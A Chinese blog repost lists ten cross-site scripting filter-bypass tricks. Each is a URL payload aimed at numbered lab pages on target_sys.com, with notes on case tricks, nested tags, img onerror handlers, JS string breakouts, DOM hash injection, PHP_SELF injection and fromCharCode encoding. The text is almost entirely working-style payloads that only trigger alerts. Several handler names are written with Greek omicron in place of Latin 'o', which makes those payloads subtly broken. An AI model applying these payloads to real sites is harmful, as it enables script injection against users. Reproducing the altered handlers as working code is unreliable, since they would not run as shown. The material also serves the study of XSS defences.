XSS的绕过技巧

发布时间:2024年01月22日

1、大小写绕过

http://target_sys.com/xss/xss04.php?name=<Script>alert(1);</Script>

2、属性多余

http://target_sys.com/xss/xss05.php?name=<script<script>>alert(1);</sc</script>ript>

3、转换标签

http://target_sys.com/xss/xss06.php?name=moon<img src=a οnerrοr=alert(1)>

4、禁用alert

http://target_sys.com/xss/xss07.php?name=<img src="1" οnerrοr="confirm('xss')">

5、js输出

http://target_sys.com/xss/xss08.php?name=moon";alert($a)//

6、js过滤输出

过滤单引号

http://target_sys.com/xss/xss09.php?name=moon';alert($a);//

7、dom输出

http://target_sys.com/xss/xss10.php?name=moon#<script>alert(1);</script>

http://target_sys.com/xss/xss10.php?name=moon#<script>alert(/xss/);</script>

hash 属性是一个可读可写的字符串,该字符串是 URL 的锚部分(从 # 号开始的部分)。

substring 从#开始截取后面的部分

8、urlxss

http://target_sys.com/xss/xss11.php/" οnsubmit="alert('1')

$_SERVER['PHP_SELF']

9、过滤特殊字符

php开启gpc之后

单引号(’)、双引号(”)、反斜线()与 NUL(NULL 字符)等字符都会被加上反斜线

http://target_sys.com/xss/xss12.php?name=<script>alert(1);</script>

http://target_sys.com/xss/xss12.php?name=<script>eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,13))</script>

10、过滤大小号

http://target_sys.com/xss/xss13.php?name=moon' οnmοuseοver='javascript:alert(1)

文章来源:https://blog.csdn.net/2301_76786857/article/details/135741344
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。